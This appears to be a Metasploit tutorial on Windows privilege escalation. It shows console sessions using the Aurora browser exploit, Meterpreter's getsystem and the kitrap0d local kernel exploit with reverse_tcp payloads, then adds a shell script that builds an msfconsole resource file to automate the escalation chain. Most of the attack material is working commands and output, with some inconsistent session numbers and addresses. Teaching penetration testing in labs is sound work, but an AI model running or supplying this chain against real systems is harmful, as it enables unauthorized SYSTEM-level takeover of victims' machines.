Frequently, especially with client-side exploits, you will find that your session only has limited user rights. This severely restricts what you can do on the remote system, such as dumping password hashes, manipulating the registry, or installing backdoors. Fortunately, Metasploit provides the Meterpreter command getsystem (part of the priv extension), which tries a number of different techniques to obtain SYSTEM-level privileges on the remote system. There are also various other (local) exploits that can be used to escalate privileges.
Using the infamous "Aurora" exploit, we find that our Meterpreter session is running only as a regular user account.
msf exploit(ms10_002_aurora) >
[*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.1.161
[*] Sending stage (748544 bytes) to 192.168.1.161
[*] Meterpreter session 3 opened (192.168.1.71:38699 -> 192.168.1.161:4444) at 2010-08-21 13:39:10 -0600

msf exploit(ms10_002_aurora) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: XEN-XP-SP2-BARE\victim
meterpreter >
GetSystem
To use the getsystem command, the "priv" extension must be loaded first if it is not already. Current Windows Meterpreter payloads load priv automatically at session start, so on a recent Metasploit the command is usually available right away; on older versions you load it by hand.
meterpreter > use priv
Loading extension priv...success.
meterpreter >
Running getsystem with the -h switch displays the options available to us.
meterpreter > getsystem -h
Usage: getsystem [options]

Attempt to elevate your privilege to that of local system.

OPTIONS:

    -h        Help Banner.
    -t        The technique to use. (Default to '0').
                0 : All techniques available
                1 : Service - Named Pipe Impersonation (In Memory/Admin)
                2 : Service - Named Pipe Impersonation (Dropper/Admin)
                3 : Service - Token Duplication (In Memory/Admin)

meterpreter >
We will let Metasploit do the heavy lifting by running getsystem without any options. The command tries every available technique in order and stops at the first one that succeeds. Note the "Admin" tag on every technique: each of them creates a service or duplicates a SYSTEM token, so they take a session from an administrative context to SYSTEM and do not by themselves elevate an unprivileged user. In the blink of an eye, our session is now running with SYSTEM privileges.
meterpreter > getsystem
...got system (via technique 1).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Local Exploits
There are cases where getsystem fails. For example:
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter >
This typically means the session's user is not an administrator, or is an administrator whose token is restricted by UAC, so none of the getsystem techniques can create a service or open a SYSTEM process. When this happens, we can background the session and manually try some of the other local exploits that Metasploit has to offer: bypassuac modules for the UAC-restricted case, or kernel and service exploits for an unprivileged user. Note: the available exploits change over time, and current versions of Metasploit also ship post/multi/recon/local_exploit_suggester, which runs the check methods of the local exploits against a session to narrow down the candidates.
meterpreter > background
[*] Backgrounding session 1...
msf exploit(ms10_002_aurora) > use exploit/windows/local/
...snip...
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
...snip...
use exploit/windows/local/ms10_015_kitrap0d
use exploit/windows/local/ms10_092_schelevator
use exploit/windows/local/ms11_080_afdjoinleaf
use exploit/windows/local/ms13_005_hwnd_broadcast
use exploit/windows/local/ms13_081_track_popup_menu
...snip...
msf exploit(ms10_002_aurora) >
Let's try the well-known kitrap0d exploit (MS10-015) against the target. Our example box is a 32-bit machine and is listed as one of the vulnerable targets. Because this is a kernel exploit, a failed attempt can crash the target rather than just returning an error, so confirm the OS version and architecture against the module's target list before running it, and deliver the new payload on a different port so the handler does not collide with the existing session.
msf exploit(ms10_002_aurora) > use exploit/windows/local/ms10_015_kitrap0d
msf exploit(ms10_015_kitrap0d) > set SESSION 1
msf exploit(ms10_015_kitrap0d) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_015_kitrap0d) > set LHOST 192.168.1.161
msf exploit(ms10_015_kitrap0d) > set LPORT 4443
msf exploit(ms10_015_kitrap0d) > show options

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     192.168.1.161    yes       The listen address
   LPORT     4443             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)


msf exploit(ms10_015_kitrap0d) > exploit

[*] Started reverse handler on 192.168.1.161:4443
[*] Launching notepad to host the exploit...
[+] Process 4048 launched.
[*] Reflectively injecting the exploit DLL into 4048...
[*] Injecting exploit into 4048 ...
[*] Exploit injected. Injecting payload into 4048...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (769024 bytes) to 192.168.1.71
[*] Meterpreter session 2 opened (192.168.1.161:4443 -> 192.168.1.71:49204) at 2014-03-11 11:14:00 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
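The whole procedure above (check who the session is, let getsystem try its techniques, then fall back to one local exploit module after another, each with its own handler port) can be replayed from a single msfconsole resource script instead of being typed by hand. The script below is an added example, not code from the original page or from the Metasploit project: it generates such a resource file with a small POSIX shell function. It relies on the msfconsole core commands `sessions -C` (run a Meterpreter command on a session without entering interactive mode, available in current msfconsole), `sleep` and `exploit -j`; the session id 1, the handler address 192.168.1.161, the starting port 4443 and the module list are illustrative values taken from this page, not something the script discovers.

```shell
#!/bin/sh
# Added example (not from the original page or the Metasploit project).
# Builds an msfconsole resource script that replays the escalation chain:
# getuid -> getsystem -> getuid, then each local exploit module in turn.
# Assumptions: session id, LHOST, ports and module names are illustrative.

# gen_privesc_rc SESSION LHOST FIRST_PORT MODULE...
# Prints the resource script to stdout. Each module gets its own LPORT
# (FIRST_PORT, FIRST_PORT+1, ...) so the new handlers never collide with
# the handler that owns the existing session.
gen_privesc_rc() {
    sid="$1"; lhost="$2"; port="$3"; shift 3
    # 'sessions -C <cmd> -i <id>' runs a Meterpreter command on the session
    # and returns to the msf prompt, so the resource script keeps going.
    printf 'sessions -C getuid -i %s\n' "$sid"
    printf 'sessions -C getsystem -i %s\n' "$sid"
    printf 'sessions -C getuid -i %s\n' "$sid"
    for mod in "$@"; do
        printf 'use %s\n' "$mod"
        printf 'set SESSION %s\n' "$sid"
        printf 'set PAYLOAD windows/meterpreter/reverse_tcp\n'
        printf 'set LHOST %s\n' "$lhost"
        printf 'set LPORT %s\n' "$port"
        # Run as a background job, give the payload time to call back,
        # then list sessions so a new SYSTEM session is visible in the log.
        printf 'exploit -j\n'
        printf 'sleep 10\n'
        printf 'sessions -l\n'
        port=$((port + 1))
    done
}

# is_system GETUID_LINE
# Succeeds when a 'Server username:' line reports NT AUTHORITY\SYSTEM,
# which is the condition for stopping the chain.
is_system() {
    case "$1" in
        *'NT AUTHORITY\SYSTEM'*) return 0 ;;
        *) return 1 ;;
    esac
}

# write_privesc_rc PATH: writes the script for the page's scenario to PATH
# and returns the path, ready for: msfconsole -q -r PATH
write_privesc_rc() {
    gen_privesc_rc 1 192.168.1.161 4443 \
        exploit/windows/local/ms10_015_kitrap0d \
        exploit/windows/local/ms10_092_schelevator > "$1"
    printf '%s\n' "$1"
}

# Usage when run directly:
#   sh privesc_rc.sh && msfconsole -q -r /tmp/privesc.rc
write_privesc_rc "${TMPDIR:-/tmp}/privesc.rc" >/dev/null
```

The generated file is plain msfconsole input, so you can read it before running it and remove any module whose target list does not match the box. Stop after the first module that yields a session reporting NT AUTHORITY\SYSTEM; running further kernel exploits against an already-compromised host only adds crash risk.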